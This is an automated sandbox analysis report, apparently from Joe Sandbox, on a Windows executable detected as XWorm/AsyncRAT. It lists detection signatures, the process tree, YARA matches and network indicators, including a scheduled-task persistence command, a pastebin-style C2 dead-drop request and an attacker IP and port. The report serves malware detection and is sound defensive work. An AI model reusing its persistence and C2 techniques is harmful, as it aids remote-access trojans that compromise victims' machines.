
Windows Analysis Report
r8k29DBraE.exe

Overview

General Information

Sample name: r8k29DBraE.exe (renamed because the original name is a hash value)
Original sample name: 03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7.exe
Analysis ID: 1533949
MD5: dc50baff9f1bab10f1ebc24e0d77afc3
SHA1: 29f4429939e57666b8a57c2d7b95a4801fa7ca20
SHA256: 03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7
Tags: exe, rentry-co, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected UAC Bypass using CMSTP
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates files in the system32 config directory
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • r8k29DBraE.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\r8k29DBraE.exe" MD5: DC50BAFF9F1BAB10F1EBC24E0D77AFC3)
    • wzcsapi.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\wzcsapi.exe" MD5: 64FFE7C0FA6AC22F5ACAFD3CEB4ACA5B)
      • schtasks.exe (PID: 7308 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wzcsvc.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\wzcsvc.exe" MD5: A69C6E092D415063A9FB80F8FE4E3444)
      • svchost.exe (PID: 6108 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • WerFault.exe (PID: 6208 cmdline: C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 7240 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 7640 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1852 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1976 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1992 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7180 cmdline: C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings (listed beneath the row)
00000001.00000002.1595934770.000002611005F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000001.00000002.1598581961.000002616E806000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x661c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x66b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x67ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x648c:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings (listed beneath the row)
3.2.wzcsapi.exe.28cf290.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.2.wzcsapi.exe.28cf290.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x481c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x48b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x49ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x468c:$cnc4: POST / HTTP/1.1
3.2.wzcsapi.exe.1bee0000.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.2.wzcsapi.exe.1bee0000.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x481c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x48b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x49ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x468c:$cnc4: POST / HTTP/1.1
1.2.r8k29DBraE.exe.2616e7b0000.10.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security

                System Summary

                Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wzcsvc.exe" , ParentImage: C:\Users\user\Desktop\wzcsvc.exe, ParentProcessId: 5480, ParentProcessName: wzcsvc.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6108, ProcessName: svchost.exe
                Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wzcsvc.exe" , ParentImage: C:\Users\user\Desktop\wzcsvc.exe, ParentProcessId: 5480, ParentProcessName: wzcsvc.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6108, ProcessName: svchost.exe
                No Suricata rule has matched


                AV Detection

                Source: r8k29DBraE.exe | Avira: detected
                Source: C:\Users\user\Desktop\wzcsapi.exe | Avira: detection malicious, Label: TR/Dropper.Gen
                Source: C:\Users\user\Desktop\wzcsvc.exe | Avira: detection malicious, Label: HEUR/AGEN.1362795
                Source: C:\Users\user\Desktop\wzcsapi.exe | ReversingLabs: Detection: 83%
                Source: C:\Users\user\Desktop\wzcsvc.exe | ReversingLabs: Detection: 87%
                Source: r8k29DBraE.exe | ReversingLabs: Detection: 66%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability
                Source: C:\Users\user\Desktop\wzcsapi.exe | Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\wzcsvc.exe | Joe Sandbox ML: detected
                Source: r8k29DBraE.exe | Joe Sandbox ML: detected

                Exploits

                Source: Yara match | File source: 1.2.r8k29DBraE.exe.2616e7b0000.10.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.1595934770.000002611005F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1598581961.000002616E806000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: r8k29DBraE.exe PID: 1408, type: MEMORYSTR
                Source: unknown | HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49731 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.7:49767 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52493 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52495 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52497 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52500 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52504 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52509 version: TLS 1.2
                Source: r8k29DBraE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdbP source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE551.tmp.dmp.8.dr
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE551.tmp.dmp.8.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb$ source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb\2 source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: gs.pdb'E source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.ni.pdbD source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: gs.pdb source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbHt' source: WERE551.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdbLe: source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb@ source: WERE551.tmp.dmp.8.dr
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.pdbMZ source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb$g source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F59E250 FindFirstFileExW,1_2_000002616F59E250
                Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819BE250 FindFirstFileExW,5_2_00000216819BE250
                Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1EE250 FindFirstFileExW,6_2_000001CA7D1EE250
                Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C0E250 FindFirstFileExW,8_2_00000265B3C0E250
                Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD5E250 FindFirstFileExW,9_2_0000017D2DD5E250
                Source: C:\Windows\System32\svchost.exe | Code function: 10_2_0000022F4B92E250 FindFirstFileExW,10_2_0000022F4B92E250
                Source: C:\Windows\System32\svchost.exe | Code function: 11_2_0000013DE272E250 FindFirstFileExW,11_2_0000013DE272E250
                Source: C:\Windows\System32\dwm.exe | Code function: 14_2_00000262F1CAE250 FindFirstFileExW,14_2_00000262F1CAE250
                Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002234E15E250 FindFirstFileExW,15_2_000002234E15E250
                Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000023942B1E250 FindFirstFileExW,16_2_0000023942B1E250
                Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000001EF056DE250 FindFirstFileExW,17_2_000001EF056DE250
                Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000002287AD7E250 FindFirstFileExW,18_2_000002287AD7E250
                Source: C:\Windows\System32\svchost.exe | Code function: 19_2_000001B94DA9E250 FindFirstFileExW,19_2_000001B94DA9E250
                Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002520257E250 FindFirstFileExW,20_2_000002520257E250
                Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001A9EBFCE250 FindFirstFileExW,21_2_000001A9EBFCE250
                Source: C:\Windows\System32\svchost.exe | Code function: 22_2_0000019FF163E250 FindFirstFileExW,22_2_0000019FF163E250

                Networking

                Source: C:\Windows\System32\svchost.exe | Domain query: i.ibb.co
                Source: unknown | DNS query: name: rentry.co
                Source: Yara match | File source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global traffic | TCP traffic: 192.168.2.7:49740 -> 147.185.221.18:36538
                Source: global traffic | TCP traffic: 192.168.2.7:52281 -> 1.1.1.1:53
                Source: global traffic | HTTP traffic detected: GET /tranr/raw HTTP/1.1; Host: rentry.co; Connection: Keep-Alive
